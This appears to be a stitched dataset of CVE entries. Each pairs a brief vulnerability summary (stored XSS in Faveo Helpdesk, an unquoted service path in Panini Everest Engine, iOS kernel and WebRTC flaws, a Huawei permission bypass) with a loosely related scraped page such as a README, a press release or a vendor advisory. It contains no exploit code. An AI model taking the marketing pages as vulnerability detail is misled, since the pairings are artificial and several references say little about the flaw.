**Version 0.9.8.240 – 0.9.8.247** (released 17/02/2017)  
– **\[New Feature\]** NEW friendly PHP Version Switcher with many addons and more to come…  
– **\[UPDATE\]** Update of PHP versions: 7.1.2, 7.0.16, 5.6.30  
– **\[Old Removed\]** Old PHP Version Switcher removed from the left menu but still exists.  
– **\[BUGFIX\]** Fixed several bugs

**Version 0.9.8.239** (released 13/02/2017)  
– **\[BUGFIX\]** Fixed bug with softaculous remove mysql user.

**Version 0.9.8.237 & 0.9.8.238** (released 11/02/2017)  
– **\[New Feature\]** LiteSpeed Enterprise integration with CWP

**13/02/2017**  
…we were working very hard to make CWP work with CentOS 7 so we have done many changes are unfortunately there is no any info what was done before in which version.

CVE-2019-13385: ChangeLog for CentOS 7 | Control Web Panel

Faveo Helpdesk Enterprise version 6.0.1 allows an attacker with agent permissions to perform privilege escalation on the application. This occurs because the application is vulnerable to stored XSS.





    
                     ______                      _    _      _           _           _    
                    |  ____|                    | |  | |    | |         | |         | |   
                    | |__ __ ___   _____  ___   | |__| | ___| |_ __   __| | ___  ___| | __
                    |  __/ _` \ \ / / _ \/ _ \  |  __  |/ _ \ | '_ \ / _` |/ _ \/ __| |/ /
                    | | | (_| |\ V /  __/ (_) | | |  | |  __/ | |_) | (_| |  __/\__ \   < 
                    |_|  \__,_| \_/ \___|\___/  |_|  |_|\___|_| .__/ \__,_|\___||___/_|\_\
                                                              | |                         
                                                              |_|                         
                 
    

  
       

Faveo Helpdesk provides Businesses with an automated Helpdesk system to manage customer support.

The word Faveo comes from Latin which means to be favourable. Which truly highlights vision and the scope as well as the functionality of the product that Faveo is. In today’s competitive startup scenario customer retention is one of the major challenges. Handling client query diligently is all the difference between retaining or losing a long lasting relationship. The company is driven with passion of providing tools for managing consumer queries for strategic insights and helping companies take those decisive decisions.

Faveo has been integrated with multiple platforms and new features being added each month.

Faveo can be customised according to requirement and we do undertake such request.

**Flavors of Faveo**

*   Faveo Help Desk Community Edition – Free, Open source edition
*   Faveo Help Desk Freelancer - Free version with features available in Faveo Enterprise Edition for two agents
*   Faveo Help Desk Enterprise Edition – Paid version with many advance features and integrations
*   Faveo Service Desk - Paid version for IT Assest management

View complete comparision list of all flavors of Faveo to select the most suitable solution for your business

**Faveo Documentation**

*   Faveo user Manual
*   Faveo API Documentation
*   Faveo Event List
*   Faveo Plugin creation guide

**Requirements**

To run Faveo your host just needs a couple of things:

*   PHP Version: 8.1+
*   Database: MySQL 8.0.x or MariaDB 10.6.x
*   Web Server: Apache / IIS / Nginx
*   PHP Extensions: Imap, Mbstring, Mcrypt, OpenSSL, PDO, Tokenizer, XML, Zip
*   Web Server Extension: Pretty URLs or Search Engine Friendly URLs have to be enabled in your web server configuration

**Faveo Web Hosting**

Ladybird Web Host Offers hosting with minimum requirement to host Faveo web application. Faveo has been tested on Ladybird Web Host servers & works very well in their server environment. All web hosting packages offered by Ladybird Web Host come with 30 day money back gurantee.

**Credits**

*   Laravel Framework
*   Admin LTE Theme

**Website**

Visit our website for more information on services offered by us www.faveohelpdesk.com

**YouTube Channel**

Find demo, installation, configuration, tutorial videos on our channel here

**Road Map for Community Edition**

See what all features are going to be part of upcoming releases here

**Faveo Probe**

Helps verify whether your server can run Faveo or not. Download here

**Faveo Community**

Join Faveo discussion group and stay tuned to latest updates.  

*   Join us on LinkedIn
*   Join us on Slack
**Support the community edition**

If you are using our product and want to support us Click here

**Language translate**

Help us translate Faveo into your native language Click here  
We are following Laravel localization module, you can create language file in your branch and send a pull request.

**Contributing**

Create your own fork of Faveo master repositoray and use git-flow to create a new feature. Once the feature is published in your fork, send a pull request to begin the conversation of integrating your new feature into Faveo. Please see the contributing guidelines before sending pull requests.

**Error Reporting**

Faveo uses Bugsnag to monitor application stability in production enviroment. It helps us to provide bug fixes and feature updates after analyzing the logs and crash reports for the application. **If you are customizing the application under development environment, we request you to disable this error reporting.** It will allow us to ignore the errors occurred during your development cycle and we can focus more on the exceptions/bugs occuring in live system of other users of Faveo community. It can be easily disabled from "Error logs and debugging" option in admin panel or by updating your app environment to development in .env.

You can still report the issues on our Github Issue page by providing proper information about the changes you are trying to implement. We assure you that Faveo community will help you and your customization can be a part of Faveo application if it follows our contributing guidelines.

**Security Policy****Supported Versions**

Check mark versions are supported with security patches.

Version

Supported

2.0.1

✅

2.0.0

❌

< 1.0

❌

**Supported Updates**

Security updates will be released once in a month. If it's high priority, we will make it twice a month

**Reporting a Vulnerability**

Please report (suspected) security vulnerabilities to support@faveohelpdesk.com. You will receive a response from us within 48 hours. If the issue is confirmed, we will release a patch as soon as possible depending on complexity but historically within a few days.

**Help**

Visit the issue page. And if you'd like professional help commercial support is available, email us through the contact form.

**Follow Us**

CVE-2023-1724: GitHub - ladybirdweb/faveo-helpdesk: Faveo Open source ticketing system build on Laravel framework

Panini Everest Engine 2.0.4 allows unprivileged users to create a file named Everest.exe in the %PROGRAMDATA%\Panini folder. This leads to privilege escalation because a service, running as SYSTEM, uses the unquoted path of %PROGRAMDATA%\Panini\Everest Engine\EverestEngine.exe and therefore a Trojan horse %PROGRAMDATA%\Panini\Everest.exe may be executed instead of the intended vendor-supplied EverestEngine.exe file.

Panini, a global payments technology leader, officially announced that its Everest solution architecture that integrates computing platforms with check capture, was recently fully patented in the United States. This newly established approach is ground-breaking and further substantiates Panini as a visionary in payments technology.

Panini’s Everest unleashes the full power of Panini scanning platforms while dramatically removing the cost and complexity of integration, deployment and support for its customers and partners. Check scanning devices developed with this new technology can be used in different settings and even shared among users, making the move from Branch Image Capture (BIC) to Teller Image Capture (TIC) more attractive to financial institutions and aligning with the “bank of the future” trend of empowering roaming universal bankers in an open lobby environment. Not only will Everest offer more solution options for bank branches, but it will make Remote Deposit Capture (RDC) applications more flexible and easier to deploy and support: new devices like Panini’s EverneXt™ (up to 160 documents per minute) and mI:Deal™ (single feed) can easily be operated by a smart phone, tablet, or computer, with no need to download an API and keep it up-to-date over time. 

The Everest technology integrated into Panini scanning platforms enables the capture devices to be connected to any computing platform (such as tablets, PCs, smartphones, and POS terminals) via a choice of wired or wireless interfaces (Wi-Fi, Ethernet, USB), while replacing the traditional complexity of integration via API (application programming interface) with a state-of-the-art, secure HTTPS communications protocol. This architecture is the next decisive step in the evolution of Panini platforms designed to write the next chapter of paper-based payments dematerialization.

“Panini’s Everest-enabled intelligent scanning platforms open new possibilities for our customers and partners including on-board applications, shared devices, and untethered operation”, said Michael Pratt, Chief Executive Officer at Panini.

On October 4, 2016, the United States Patent and Trademark Office (USPTO) assigned Patent number 9,460,427 to the Everest technology, which builds on decades of Panini’s experience as a global leader in payments capture and displays yet another differentiator in the market. Panini thus continues to prove they operate as a dynamic and innovative organization delivering breakthrough, game-changing solutions.

**About Panini**  
Founded in Turin, Italy, Panini has enabled clients to capitalize on shifts in the global payments processing market for more than seventy years. Panini has a rich history of technology innovation, leveraging the company’s expertise in research & development. Panini’s market leading solutions are based on state-of-the-art engineering resources and ISO-9001 quality certified production. Panini offers check capture solutions that enable customers to fully realize the advantages and efficiencies available with the digital transformation of the paper check, resulting in the world’s largest deployed base of check capture systems, now approaching one million devices. Panini’s scalable check capture solutions address the complete range of distributed check processing opportunities including teller capture, back-counter capture, remote deposit capture, remittance processing and point-of-sale capture. The company provides solutions on a global basis, and has direct subsidiary operations in the United States covering North America and in Brazil covering Latin American markets. For more information visit: www.panini.com.

*   Português
*   Español
*   Italiano

CVE-2022-39959: Panini Patents Revolutionary New “Everest” Architecture

Apple Security Advisory 2023-10-04-1 - iOS 17.0.3 and iPadOS 17.0.3 addresses buffer overflow and code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-10-04-1 iOS 17.0.3 and iPadOS 17.0.3iOS 17.0.3 and iPadOS 17.0.3 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT213961.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.KernelAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A local attacker may be able to elevate their privileges. Appleis aware of a report that this issue may have been actively exploitedagainst versions of iOS before iOS 16.6.Description: The issue was addressed with improved checks.CVE-2023-42824WebRTCAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A buffer overflow may result in arbitrary code executionDescription: The issue was addressed by updating to libvpx 1.13.1.WebKit Bugzilla: 262365CVE-2023-5217This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 17.0.3 and iPadOS 17.0.3".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUd15wACgkQX+5d1TXaIvqEoQ/+PIrFp2opkANUwD7d+pcGVnkS4fK7lGqqG6FMpuGuRhf8E+lf/SVAMzcKbXfFLhb+Fs/Z+81RKwy3xmC/kHis9K/SWaMFsTW0ctfeU83hSMIQ+JI0wvfnJy/c8thYA6u151HqJdAZKruyphTz4OEq2eUJqvPXGxiHNWyjfCacpmLnUt24WbVTL4CaGqX3tRsJLCH4XEJ/hYXNBZUolwdz4vFUG1P9OsjzOaTSIt0sVg/LZK5MTu7tcvEEBKXu9Rsfkq1KgXy6E3xo5/nkyZiMBvOLoWIPNq2BYA5Hw2V2wow6mPEpqaMPTsuFEMRJ0wqJfQwBtuRtdRt+mNJRE62+4lTfuDGEgvYlasGCqw2t180eiXQHtjoGBEwgXJ0rsjADZtTGnmEir2r/P+bRajtQRAmsVf1zhSpSksHib/3CFlin3dsLqB48lPCYy4K72u6vGrISKehm7bT3i5cxMD9ktcDEUd3TP4BjSHruttRb95UnQmQHlr6X68JAL2iT20POFpa6U8PBlgRTOKOL251lB3Ri+Q/TIO0KtTj6d6SIWAxdOyPtaHM458l3oUeexzEd7U8afA4LdITYwlETsFau/HTdky/CJjnVAaigtvnOBbrK8AIGPG2lOLwm2KiNvElbQ2M/JokxOahO/+f/PYWKOIzyVYnQA8xfP2cVSg9fqAA=eLl5-----END PGP SIGNATURE-----

Apple Security Advisory 2023-10-04-1

A permission bypass vulnerability in Huawei cross device task management could allow an attacker to access certain resource in the attacked devices. Affected product versions include:JAD-AL50 versions 102.0.0.225(C00E220R3P4).

**Security Advisory - Permission Bypass Vulnerability in Huawei Products**

*   SA No:huawei-sa-20220819-01-7e0a6103
*   Initial Release Date: Aug 19, 2022
*   Last Release Date: Aug 19, 2022

  

A permission bypass vulnerability in Huawei cross device task management could allow an attacker to access certain resource in the attacked devices. (Vulnerability ID: HWPSIRT-2021-96118)

This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2021-46834.

For products that have released software updates to fix this vulnerability, Huawei will release and update the Security Advisory at:

http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20220819-01-7e0a6103-en

Affected Product

Affected Version

Resolved Version

JAD-AL50

102.0.0.225(C00E220R3P4)

102.0.0.245(C00E245R3P4)

  

Successful exploitation could allow an attacker to access certain resource in the attacked devices.

This vulnerability can be exploited only when the following conditions are present:

The attacked device needs to initiate cross device task management to the attacker device.

Vulnerability details:

A permission bypass vulnerability in the cross device task management function of Huawei products. This vulnerability exists because insufficient permission verification. After the attacked device initiates cross device task management to the attacker device, the attacker could exploit the vulnerability through this function. A successful exploit could allow the attacker to access certain resource in the attacked devices.

The product that supports automatic update will receive a system update prompt. You can install the update to fix the vulnerability.  

The vulnerability was discovered by external researchers.

Huawei adheres to protecting the ultimate interests of users with best efforts and the principle of responsible disclosure and deal with product security issues through our response mechanism.

To enjoy Huawei PSIRT services and obtain Huawei product vulnerability information, please visit http://www.huawei.com/en/psirt.

To report a security vulnerability in Huawei products and solutions, please send it to PSIRT@huawei.com. For details, please visit http://www.huawei.com/en/psirt/report-vulnerabilities.

This document is provided on an "AS IS" basis and does not imply any kind of guarantee or warranty, either express or implied, including the warranties of merchantability or fitness for a particular purpose. In no event shall Huawei or any of its directly or indirectly controlled subsidiaries or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. Your use of the document, by whatsoever means, will be totally at your own risk. Huawei is entitled to amend or update this document from time to time.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us